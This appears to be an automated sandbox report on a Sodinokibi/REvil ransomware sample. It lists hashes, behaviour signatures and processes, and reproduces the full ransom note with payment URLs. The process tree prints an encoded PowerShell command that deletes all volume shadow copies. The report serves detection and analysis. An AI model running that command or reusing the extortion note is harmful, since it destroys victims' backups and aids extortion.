Overview

overview

10

Static

static

10

14c8e3f1f2...08.exe

windows7-x64

10

14c8e3f1f2...08.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-09-2024 17:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Users\3805xd4j-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3805xd4j. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE655257CD8F4ABD 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/EE655257CD8F4ABD Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 14yIEPlx6c+xr/NT7OT0lZ8z7O+ZJXKB8SFee1FfR5MBx5tUftJOuqnMGIFq+qkR hFnqtVTKt1zMQnoQ7gvE/9qmPLrIcg0GT8oV2NFpjdD7FY0dU9tg4uBvtw4Ki7VP l7MrSOozcLTTMWuaUn7k9Zuv48slKsALWFSelkDVCeYaw6xlZXBcM57fJq2r7XAQ zB+aGH6Aw6Y2OrXJzWgWcQ6P1dCVXp+ZX1uGjScFyTpmYK/+m+h6Fyzj4/jUpa5h MXrdEbszATP2lSFjdvVPmaByY/+VzxSJiJ4abcRnKEud0M66/sFVHtn4DrdvD74d XIrWXPs9DveTIR0VE/xKuF11r/f4axWXAIrJ/E2vPZ+fs/t4cyVtwB/IuTeRslAE RjhUlJpSIuRq0JsOEYbYXuDW2Qmmkn7fMRf3S2xxkXxuKglsYEUBZPOf0iRfruzO fMN4D6ve0nHS4518t4SCRHkcNtPXJbP5Y5tFl4Dyn2MT0GUpAC1QOv767FFDFIIm ORROxl36kyOHOvYQ58ZaX61NHPt1uFQxn+Boe1GqhFpnnniEtsA7/0jxlkj6l15x i2+Tl5P+8D/UibaayFSFGfjN8QfOo3sRn/k9Zw2F3aXLHVfEmDWxWBwsq6jwmgKC Fys3etwDcdqUXTc/ry/StE1h85jYKKEm0b/6186Ay7nD3BRE+FJAnJ6wym8uPuBI TlnyCWNvJc5aWu+xDOHkV+VO3K5mU+Z+oawvQpAt1ZSqLmmD5XXSAwMtF1HmaKtD +SuZlg238ivxQSMSanwzpbde4bCSrV0ERUqVxCRhSgNt0ot012z/rWAUE8GdzfYi EVJHxhtEEwKMKK3waxtDX/wORavyWadi8rH/qx4n9I5tPjpgIHtFmOTqxa4f0z1r 572wLdQ7aR9LZIoedOd2L5dsURdIn5pc8VyQzj6zqAI5oCGzYKI2FO/+7tq3vxlh 3pCdzJ8xCcux9MnINvGoj9UbffJ4wSVk3KwLExuBUi4iAyPy2uZeuDck3fmNLQr0 2GkvPgJpXSSpLbZFsXubzANw40CU4N51jdvEvY+GEhNYb2i3ZEoBAqJvic0XygXB Ov/uFg52sb1Wl5UzVmYwAMWHLqRSHvms9w6lgK6m4ZZddKiQ3VCzjLaWZ+f4A3k5 IQ8TpDWCH4sj4+DD8AluUT9b6CIRuBUhm8RpTeKJ3iWfQ5vHn7Hg4BzKPNE7ooIX KULKFvFm1QxpWZqYEZcDW16vBXuB/EEGZ5bkUbkcEqeOoKju71bTHWFSP+LIeUqu 0YwSaSQr7o2nokCrvCJY4ulgeATDjXrSmKkj6vW62NhrjcE6ffin6RftLhtvXqg0 FEGLl7E5xxnj9gmsIxVXr3t7oquMcE51dzCoeZ80YKenaC1cr6SyVd/U ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EE655257CD8F4ABD

http://decryptor.cc/EE655257CD8F4ABD

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 26 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe
    "C:\Users\Admin\AppData\Local\Temp\14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:544
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:320
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5072

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\3805xd4j-readme.txt
      Filesize

      7KB

      MD5

      39c16baccbb3428f1f8ee4de464ded58

      SHA1

      5d798fb2cee065a11319cb7d63481df95c56b9b3

      SHA256

      03236c9e543578af29e436843726c245be78807d36fbdebf274edad3e4ab1002

      SHA512

      c15c8b21c0e95344a5cffeae0de74f9db27830286d66a5496685f4bf6278ab91d27982c905d907fecf0b35ec4cd6ccaf1d83b5e8bd43fcc774af46b736554fe4

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isoxyaug.rj1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/544-0-0x00007FFAA6343000-0x00007FFAA6345000-memory.dmp

      Filesize

      8KB

      Download

    • memory/544-2-0x0000014A9B090000-0x0000014A9B0B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/544-11-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/544-12-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/544-15-0x00007FFAA6340000-0x00007FFAA6E01000-memory.dmp

      Filesize

      10.8MB

      Download